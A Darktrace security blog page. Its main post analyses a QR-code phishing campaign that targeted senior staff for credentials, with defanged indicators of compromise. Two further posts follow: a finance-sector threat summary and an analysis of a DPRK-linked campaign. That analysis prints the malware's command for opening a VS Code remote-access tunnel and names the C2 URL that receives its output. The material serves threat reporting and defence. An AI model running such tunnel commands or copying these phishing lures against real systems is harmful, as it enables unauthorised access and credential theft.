Blog
/
Email
/
July 6, 2023

How Darktrace Foiled QR Code Phishing

Explore Darktrace's successful detection of QR code phishing. Understand the methods used to thwart these sophisticated cyber threats.
Written by
Alexandra Sentenac
Cyber Analyst
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Alexandra Sentenac
Cyber Analyst
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
06
Jul 2023

What is a QR Code?

Invented by a Japanese company in 1994 to label automobile parts, Quick Response codes, best known as QR codes, are rapidly becoming ubiquitous everywhere in the world. Their design, inspired by the board and black and white pieces of the game of Go, permits the storage of more information than regular barcodes and to access that information more quickly. The COVID-19 pandemic contributed to their increased popularity as it conveniently replaced physical media of all types for the purpose of content sharing. It is now common to see them in restaurant menus, plane tickets, advertisements and even in stickers containing minimal to no text pasted on lamp posts and other surfaces, enticing passers-by to scan its content. 

QR Code Phishing Attacks (Quishing)

Recently, threat actors have been identified using QR codes too to embed malicious URLs leading the unsuspecting user to compromised websites containing malware or designed to harvest credentials. In the past month, Darktrace has observed an increase in the number of phishing emails leveraging malicious QR codes for malware distribution and/or credential harvesting, a new form of social engineering attack labelled “Quishing” (i.e., QR code phishing).

Between June 13 and June 22, 2023, Darktrace protected a tech company against one such Quishing attack when five of its senior employees were sent malicious emails impersonating the company’s IT department. The emails contained a QR code that led to a login page designed to harvest the credentials of these senior staff members. Fortunately for the customer, Darktrace / EMAIL thwarted this phishing campaign in the first instance and the emails never reached the employee inboxes. 

Trends in Quishing Attacks

The Darktrace/Email team have noticed a recent and rapid increase in QR code abuse, suggesting that it is a growing tactic used by threat actors to deliver malicious payload links. This trend has also been observed by other security solutions [1] [2] [3] [4]. The Darktrace/Email team has identified malicious emails abusing QR codes in multiple ways. Examples include embedded image links which load a QR code and QR code images being delivered as attachments, such as those explored in this case study. Darktrace/Email is continually refining its detection of malicious QR codes and QR code extraction capabilities so that it can detect and block them regardless of their size and location within the email.   

Quishing Attack Overview

The attack consisted of five emails, each sent from different sender and envelope addresses, displayed common points between them. The emails all conveyed a sense of urgency, either via the use of words such as “urgent”, “now”, “required” or “important” in the subject field or by marking the email as high priority, thus making the recipient believe the message is pressing and requires immediate attention. 

Additionally, the subject of three of the emails directly referred to two factor authentication (2FA) enabling or QR code activation. Another particularity of these emails was that three of them attempted to impersonate the internal IT team of the company by inserting the company domain alongside strings, such as “it-desk” and “IT”, into the personal field of the emails. Email header fields like this are often abused by attackers to trick users by pretending to be an internal department or senior employee, thus avoiding more thorough validation checks. Both instilling a sense of urgency and including a known domain or name in the personal field are techniques that help draw attention to the email and maximize the chances that it is opened and engaged by the recipient. 

However, threat actors also need to make sure that the emails actually reach the intended inboxes, and this can be done in several ways. In this case, several tactics were employed. Two of the five emails were sent from legitimate sender addresses that successfully passed SPF validation, suggesting they were sent from compromised accounts. SPF is a standard email authentication method that tells the receiving email servers whether emails have been sent from authorized servers for a given domain. Without SPF validation, emails are more likely to be categorized as spam and be sent to the junk folder as they do not come from authorized sources.

Another of the malicious emails, which also passed SPF checks, used a health care facility company domain in the header-from address field but was actually sent from a different domain (i.e., envelope domain), which lowers the value of the SPF authentication. However, the envelope domain observed in this instance belonged to a company recently acquired by the tech company targeted by the campaign.

This shows a high level of targeting from the attackers, who likely hoped that this detail would make the email more familiar and less suspicious. In another case, the sender domain (i.e., banes-gn[.]com) had been created just 6 days prior, thus lowering the chances of there being open-source intelligence (OSINT) available on the domain. This reduces the chances of the email being detected by traditional email security solutions relying on signatures and known-bad lists.

Darktrace Detects Quishing Attack

Despite its novelty, the domain was detected and assessed as highly suspicious by Darktrace. Darktrace/Email was able to recognize all of the emails as spoofing and impersonation attempts and applied the relevant tags to them, namely “IT Impersonation” and “Fake Account Alert”, depending on the choice of personal field and subject. The senders of the five emails had no prior history or association with the recipient nor the company as no previous correspondence had been observed between the sender and recipient. The tags applied informed on the likely intent and nature of the suspicious indicators present in the email, as shown in Figure 1. 

Darktrace/Email UI
Figure 1: Email log overview page, displaying important information clearly and concisely. 

Quishing Attack Tactics

Minimal Plain Text

Another characteristic shared by these emails was that they had little to no text included in the body of the email and they did not contain a plain text portion, as shown in Figure 2. For most normal emails sent by email clients and most automated programs, an email will contain an HTML component and a text component, in addition to any potential attachments present. All the emails had one image attachment, suggesting the bulk of the message was displayed in the image rather than the email body. This hinders textual analysis and filtering of the email for suspicious keywords and language that could reveal its phishing intent. Additionally, the emails were well-formatted and used the logo of the well-known corporation Microsoft, suggesting some level of technical ability on the part of the attackers. 

Figure 2: Email body properties giving additional insights into the content of the email. 

Attachment and link payloads

The threat actors employed some particularly innovative and novel techniques with regards to the attachments and link payloads within these emails. As previously stated, all emails contained an image attachment and one or two links. Figure 3 shows that Darktrace/Email detected that the malicious links present in these emails were located in the attachments, rather than the body of the email. This is a technique often employed by threat actors to bypass link analysis by security gateways. Darktrace/Email was also able to detect this link as a QR code link, as shown in Figure 4.

Figure 3: Further properties and metrics regarding the location of the link within the email. 
Figure 4: Darktrace / EMAIL analyzes multiple metrics and properties related to links, some of which are detailed here. 

The majority of the text, as well as the malicious payload, was contained within the image attachment, which for one of the emails looked like this: 

example of quishing email
Figure 5: Redacted screenshot of the image payload contained in one of the emails. 

Convincing Appearance

As shown, the recipient is asked to setup 2FA authentication for their account within two days if they don’t want to be locked out. The visual formatting of the image, which includes a corporate logo and Privacy Statement and Acceptable Use Policy notices, is well balanced and convincing. The payload, in this case the QR code containing a malicious link, is positioned in the centre so as to draw attention and encourage the user to scan and click. This is a type of email employees are increasingly accustomed to receiving in order to log into corporate networks and applications. Therefore, recipients of such malicious emails might assume represents expected business activity and thus engage with the QR code without questioning it, especially if the email is claiming to be from the IT department.  

Malicious Redirection

Two of the Quishing emails contained links to legitimate file storage and sharing solutions Amazon Web Services (AWS) and and InterPlanetary File System (IPFS), whose domains are less likely to be blocked by traditional security solutions. Additionally, the AWS domain link contained a redirect to a different domain that has been flagged as malicious by multiple security vendors [5]. Malicious redirection was observed in four of the five emails, initially from well-known and benign services’ domains such as bing[.]com and login[.]microsoftonline[.]com. This technique allows attackers to hide the real destination of the link from the user and increase the likelihood that the link is clicked. In two of the emails, the redirect domain had only recently been registered, and in one case, the redirect domain observed was hosted on the new .zip top level domain (i.e., docusafe[.]zip). The domain name suggests it is attempting to masquerade as a compressed file containing important documentation. As seen in Figure 6, a new Darktrace/Email feature allows customers to safely view the final destination of the link, which in this case was a seemingly fake Microsoft login page which could be used to harvest corporate credentials.

Figure 6: Safe preview available from the Darktrace/Email Console showing the destination webpage of one of the redirect links observed.

Gathering Account Credentials

Given the nature of the landing page, it is highly likely that this phishing campaign had the objective of stealing the recipients’ credentials, as further indicated by the presence of the recipients’ email addresses in the links. Additionally, these emails were sent to senior employees, likely in an attempt to gather high value credentials to use in future attacks against the company. Had they succeeded, this would have represented a serious security incident, especially considering that 61% of attacks in 2023 involved stolen or hacked credentials according to Verizon’s 2023 data breach investigations report [6]. However, these emails received the highest possible anomaly score (100%) and were held by Darktrace/Email, thus ensuring that their intended recipients were never exposed to them. 

Looking at the indicators of compromise (IoCs) identified in this campaign, it appears that several of the IPs associated with the link payloads have been involved in previous phishing campaigns. Exploring the relations tab for these IPs in Virus Total, some of the communicating files appear to be .eml files and others have generic filenames including strings such as “invoice” “remittance details” “statement” “voice memo”, suggesting they have been involved in other phishing campaigns seemingly related to payment solicitation and other fraud attempts.

Figure 7: Virus Total’s relations tab for the IP 209.94.90[.]1 showing files communicating with the IP. 

Conclusion

Even though the authors of this Quishing campaign used all the tricks in the book to ensure that their emails would arrive unactioned by security tools to the targeted high value recipients’ inboxes, Darktrace/Email was able to immediately recognize the phishing attempts for what they were and block the emails from reaching their destination. 

This campaign used both classic and novel tactics, techniques, and procedures, but ultimately were detected and thwarted by Darktrace/Email. It is yet another example of the increasing attack sophistication mentioned in a previous Darktrace blog [7], wherein the attack landscape is moving from low-sophistication, low-impact, and generic phishing tactics to more targeted, sophisticated and higher impact attacks. Darktrace/Email does not rely on historical data nor known-bad lists and is best positioned to protect organizations from these highly targeted and sophisticated attacks.

References

[1] https://www.infosecurity-magazine.com/opinions/qr-codes-vulnerability-cybercrimes/ 

[2] https://www.helpnetsecurity.com/2023/03/21/qr-scan-scams/ 

[3] https://www.techtarget.com/searchsecurity/feature/Quishing-on-the-rise-How-to-prevent-QR-code-phishing 

[4] https://businessplus.ie/tech/qr-code-phishing-hp/ 

[5] https://www.virustotal.com/gui/domain/fistulacure.com

[6] https://www.verizon.com/business/en-gb/resources/reports/dbir/ ; https://www.verizon.com/business/en-gb/resources/reports/dbir/

[7] https://darktrace.com/blog/shifting-email-conversation 

Darktrace Model Detections 

Association models

No Sender or Content Association

New Sender

Unknown Sender

Low Sender Association

Link models

Focused Link to File Storage

Focused Rare Classified Links

New Unknown Hidden Redirect

High Risk Link + Low Sender Association

Watched Link Type

High Classified Link

File Storage From New

Hidden Link To File Storage

New Correspondent Classified Link

New Unknown Redirect

Rare Hidden Classified Link

Rare Hidden Link

Link To File Storage

Link To File Storage and Unknown Sender

Open Redirect

Unknown Sender Isolated Rare Link

Visually Prominent Link

Visually Prominent Link Unexpected For Sender

Low Link Association

Low Link Association and Unknown Sender

Spoof models

Fake Support Style

External Domain Similarities

Basic Known Entity Similarities

Unusual models

Urgent Request Banner

Urgent Request Banner + Basic Suspicious Sender

Very Young Header Domain

Young Header Domain

Unknown User Tracking

Unrelated Personal Name Address

Unrelated Personal Name Address + Freemail

Unusual Header TLD

Unusual Connection From Unknown

Unbroken Personal

Proximity models

Spam + Unknown Sender

Spam

Spam models

Unlikely Freemail Correspondence

Unlikely Freemail Personalization

General Indicators models

Incoming Mail Security Warning Message

Darktrace Model Tags

Credential Harvesting

Internal IT Impersonation

Multistage payload

Lookalike Domain

Phishing Link

Email Account Takeover

Fake Account Alert

Low Mailing History

No Association

Spoofing Indicators

Unknown Correspondent

VIP

Freemail

IoC - Type - Description & Confidence

fistulacure[.]com

domain

C2 Infrastructure

docusafe[.]zip

domain

Possible C2 Infrastructure

mwmailtec[.]com

domain

Possible C2 Infrastructure

czeromedia[.]com

domain

Possible C2 Infrastructure

192.40.165[.]109

IP address

Probable C2 Infrastructure

209.94.90[.]1

IP address

C2 Infrastructure

52.61.107[.]58

IP address

Possible C2 Infrastructure

40.126.32[.]133

IP address

Possible C2 Infrastructure

211.63.158[.]157

IP address

Possible C2 Infrastructure

119.9.27[.]129

IP address

Possible C2 Infrastructure

184.25.204[.]33

IP address

Possible C2 Infrastructure

40.107.8[.]107

IP address

Probable C2 Infrastructure

40.107.212[.]111

IP address

Possible Infrastructure

27.86.113[.]2

IP address

Possible C2 Infrastructure

192.40.191[.]19

IP address

Possible C2 Infrastructure

157.205.202[.]217

IP address

Possible C2 Infrastructure

a31f1f6063409ecebe8893e36d0048557142cbf13dbaf81af42bf14c43b12a48

SHA256 hash

Possible Malicious File

4c4fb35ab6445bf3749b9d0ab1b04f492f2bc651acb1bbf7af5f0a47502674c9

SHA256 hash

Possible Malicious File

f9c51d270091c34792b17391017a09724d9a7890737e00700dc36babeb97e252

SHA256 hash

Possible Malicious File

9f8ccfd616a8f73c69d25fd348b874d11a036b4d2b3fc7dbb99c1d6fa7413d9a

SHA256 hash

Possible Malicious File

b748894348c32d1dc5702085d70d846c6dd573296e79754df4857921e707c439

SHA256 hash

Possible Malicious File

Written by
Alexandra Sentenac
Cyber Analyst
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Alexandra Sentenac
Cyber Analyst

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

Network
January 21, 2026
Watch the NIS2 Webinar
Trending blogs
1
Securing Generative AI: Managing Risk in Amazon Bedrock with Darktrace / CLOUD
Nov 19, 2025
2
The 17% of email threats SEGs miss – and how Darktrace catches them
Dec 4, 2025
3
Darktrace Named as a Leader in 2025 Gartner® Magic Quadrant™ for Email Security Platforms
Dec 3, 2025
4
From Amazon to Louis Vuitton: How Darktrace Detects Black Friday Phishing Attacks
Nov 27, 2025
5
Pre-CVE Threat Detection: 10 Examples Identifying Malicious Activity Prior to Public Disclosure of a Vulnerability
Jul 2, 2025

More in this series

No items found.
Continue reading
Email
December 18, 2025

Why Organizations are Moving to Label-free, Behavioral DLP for Outbound Email

Modern data loss doesn’t always look like a regex match. It can look like everyday communication slightly out of context. Here’s how a domain specific language model paired with behavioral learning protects labeled and unlabeled data without slowing business down.
Carlos Gray
Senior Product Marketing Manager, Email
Read more
Email
December 15, 2025

Beyond MFA: Detecting Adversary-in-the-Middle Attacks and Phishing with Darktrace

During a customer trial of Darktrace / EMAIL and Darktrace / IDENTITY, Darktrace detected an adversary-in-the-middle (AiTM) attack that compromised a user’s Office 365 account via a business email compromise (BEC) phishing email. Following the breach, the compromised account was used to launch both internal and external phishing campaigns.
David Ison
Cyber Analyst
Read more
Email
December 4, 2025

How Darktrace is ending email security silos with new capabilities in cross-domain detection, DLP, and native Microsoft integrations

Darktrace is delivering a major evolution in email security, uniting true AI-powered cross-domain detection, label-free behavioral DLP, and Microsoft-native automation – to catch the 17% of threats that SEGs miss.
Carlos Gray
Senior Product Marketing Manager, Email
Read more

Blog

/

Network

/

January 28, 2026

The State of Cybersecurity in the Finance Sector: Six Trends to Watch

Default blog imageDefault blog image

The evolving cybersecurity threat landscape in finance

The financial sector, encompassing commercial banks, credit unions, financial services providers, and cryptocurrency platforms, faces an increasingly complex and aggressive cyber threat landscape. The financial sector’s reliance on digital infrastructure and its role in managing high-value transactions make it a prime target for both financially motivated and state-sponsored threat actors.

Darktrace’s latest threat research, The State of Cybersecurity in the Finance Sector, draws on a combination of Darktrace telemetry data from real-world customer environments, open-source intelligence, and direct interviews with financial-sector CISOs to provide perspective on how attacks are unfolding and how defenders in the sector need to adapt.  

Six cybersecurity trends in the finance sector for 2026

1. Credential-driven attacks are surging

Phishing continues to be a leading initial access vector for attacks targeting confidentiality. Financial institutions are frequently targeted with phishing emails designed to harvest login credentials. Techniques including Adversary-in-The-Middle (AiTM) to bypass Multi-factor Authentication (MFA) and QR code phishing (“quishing”) are surging and are capable of fooling even trained users. In the first half of 2025, Darktrace observed 2.4 million phishing emails within financial sector customer deployments, with almost 30% targeted towards VIP users.  

2. Data Loss Prevention is an increasing challenge

Compliance issues – particularly data loss prevention -- remain a persistent risk. In October 2025 alone, Darktrace observed over 214,000 emails across financial sector customers that contained unfamiliar attachments and were sent to suspected personal email addresses highlighting clear concerns around data loss prevention. Across the same set of customers within the same time frame, more than 351,000 emails containing unfamiliar attachments were sent to freemail addresses (e.g. gmail, yahoo, icloud), highlighting clear concerns around DLP.  

Confidentiality remains a primary concern for financial institutions as attackers increasingly target sensitive customer data, financial records, and internal communications.  

3. Ransomware is evolving toward data theft and extortion

Ransomware is no longer just about locking systems, it’s about stealing data first and encrypting second. Groups such as Cl0p and RansomHub now prioritize exploiting trusted file-transfer platforms to exfiltrate sensitive data before encryption, maximizing regulatory and reputational fallout for victims.  

Darktrace’s threat research identified routine scanning and malicious activity targeting internet-facing file-transfer systems used heavily by financial institutions. In one notable case involving Fortra GoAnywhere MFT, Darktrace detected malicious exploitation behavior six days before the CVE was publicly disclosed, demonstrating how attackers often operate ahead of patch cycles

This evolution underscores a critical reality: by the time a vulnerability is disclosed publicly, it may already be actively exploited.

4. Attackers are exploiting edge devices, often pre-disclosure.  

VPNs, firewalls, and remote access gateways have become high-value targets, and attackers are increasingly exploiting them before vulnerabilities are publicly disclosed. Darktrace observed pre-CVE exploitation activity affecting edge technologies including Citrix, Palo Alto, and Ivanti, enabling session hijacking, credential harvesting, and privileged lateral movement into core banking systems.  

Once compromised, these edge devices allow adversaries to blend into trusted network traffic, bypassing traditional perimeter defenses. CISOs interviewed for the report repeatedly described VPN infrastructure as a “concentrated focal point” for attackers, especially when patching and segmentation lag behind operational demands.

5. DPRK-linked activity is growing across crypto and fintech.  

State-sponsored activity, particularly from DPRK-linked groups affiliated with Lazarus, continues to intensify across cryptocurrency and fintech organizations. Darktrace identified coordinated campaigns leveraging malicious npm packages, previously undocumented BeaverTail and InvisibleFerret malware, and exploitation of React2Shell (CVE-2025-55182) for credential theft and persistent backdoor access.  

Targeting was observed across the United Kingdom, Spain, Portugal, Sweden, Chile, Nigeria, Kenya, and Qatar, highlighting the global scope of these operations.  

7. Cloud complexity and AI governance gaps are now systemic risks.  

Finally, CISOs consistently pointed to cloud complexity, insider risk from new hires, and ungoverned AI usage exposing sensitive data as systemic challenges. Leaders emphasized difficulty maintaining visibility across multi-cloud environments while managing sensitive data exposure through emerging AI tools.  

Rapid AI adoption without clear guardrails has introduced new confidentiality and compliance risks, turning governance into a board-level concern rather than a purely technical one.

Building cyber resilience in a shifting threat landscape

The financial sector remains a prime target for both financially motivated and state-sponsored adversaries. What this research makes clear is that yesterday’s security assumptions no longer hold. Identity attacks, pre-disclosure exploitation, and data-first ransomware require adaptive, behavior-based defenses that can detect threats as they emerge, often ahead of public disclosure.

As financial institutions continue to digitize, resilience will depend on visibility across identity, edge, cloud, and data, combined with AI-driven defense that learns at machine speed.  

Learn more about the threats facing the finance sector, and what your organization can do to keep up in The State of Cybersecurity in the Finance Sector report here.  

Acknowledgements:

The State of Cybersecurity in the Finance sector report was authored by Calum Hall, Hugh Turnbull, Parvatha Ananthakannan, Tiana Kelly, and Vivek Rajan, with contributions from Emma Foulger, Nicole Wong, Ryan Traill, Tara Gould, and the Darktrace Threat Research and Incident Management teams.

[related-resource]  

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO

Blog

/

Network

/

January 27, 2026

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

campaign targeting south orea leveraging vs code for remote accessDefault blog imageDefault blog image

Introduction

Darktrace analysts recently identified a campaign aligned with Democratic People’s Republic of Korea (DPRK) activity that targets users in South Korea, leveraging Javascript Encoded (JSE) scripts and government-themed decoy documents to deploy a Visual Studio Code (VS Code) tunnel to establish remote access.

Technical analysis

Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.
Figure 1: Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.

The sample observed in this campaign is a JSE file disguised as a Hangul Word Processor (HWPX) document, likely sent to targets via a spear-phishing email. The JSE file contains multiple Base64-encoded blobs and is executed by Windows Script Host. The HWPX file is titled “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026 (1)” in C:\ProgramData and is opened as a decoy. The Hangul documents impersonate the Ministry of Personnel Management, a South Korean government agency responsible for managing the civil service. Based on the metadata within the documents, the threat actors appear to have taken the documents from the government’s website and edited them to appear legitimate.

Base64 encoded blob.
Figure 2: Base64 encoded blob.

The script then downloads the VSCode CLI ZIP archives from Microsoft into C:\ProgramData, along with code.exe (the legitimate VS Code executable) and a file named out.txt.

In a hidden window, the command cmd.exe /c echo | "C:\ProgramData\code.exe" tunnel --name bizeugene > "C:\ProgramData\out.txt" 2>&1 is run, establishinga VS Code tunnel named “bizeugene”.

VSCode Tunnel setup.
Figure 3: VSCode Tunnel setup.

VS Code tunnels allows users connect to a remote computer and use Visual Studio Code. The remote computer runs a VS Code server that creates an encrypted connection to Microsoft’s tunnel service. A user can then connect to that machine from another device using the VS Code application or a web browser after signing in with GitHub or Microsoft. Abuse of VS Code tunnels was first identified in 2023 and has since been used by Chinese Advance Persistent Threat (APT) groups targeting digital infrastructure and government entities in Southeast Asia [1].

Contents of out.txt.
Figure 4: Contents of out.txt.

The file “out.txt” contains VS Code Server logs along with a generated GitHub device code. Once the threat actor authorizes the tunnel from their GitHub account, the compromised system is connected via VS Code. This allows the threat actor to have interactive access over the system, with access to the VS Code’s terminal and file browser, enabling them to retrieve payloads and exfiltrate data.

GitHub screenshot after connection is authorized.
Figure 5: GitHub screenshot after connection is authorized.

This code, along with the tunnel token “bizeugene”, is sent in a POST request to hxxps://www[.]yespp[.]co[.]kr/common/include/code/out[.]php, a legitimate South Korean site that has been compromised is now used as a command-and-control (C2) server.

Conclusion

The use of Hancom document formats, DPRK government impersonation, prolonged remote access, and the victim targeting observed in this campaign are consistent with operational patterns previously attributed to DPRK-aligned threat actors. While definitive attribution cannot be made based on this sample alone, the alignment with established DPRK tactics, techniques, and procedures (TTPs) increases confidence that this activity originates from a DPRK state-aligned threat actor.

This activity shows how threat actors can use legitimate software rather than custom malware to maintain access to compromised systems. By using VS Code tunnels, attackers are able to communicate through trusted Microsoft infrastructure instead of dedicated C2 servers. The use of widely trusted applications makes detection more difficult, particularly in environments where developer tools are commonly installed. Traditional security controls that focus on blocking known malware may not identify this type of activity, as the tools themselves are not inherently malicious and are often signed by legitimate vendors.

Credit to Tara Gould (Malware Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Appendix

Indicators of Compromise (IoCs)

115.68.110.73 - compromised site IP

9fe43e08c8f446554340f972dac8a68c - 2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse

MITRE ATTACK

T1566.001 - Phishing: Attachment

T1059 - Command and Scripting Interpreter

T1204.002 - User Execution

T1027 - Obfuscated Files and Information

T1218 - Signed Binary Proxy Execution

T1105 - Ingress Tool Transfer

T1090 - Proxy

T1041 - Exfiltration Over C2 Channel

References

[1]  https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/

Continue reading
About the author
Your data. Our AI.
Elevate your network security with Darktrace AI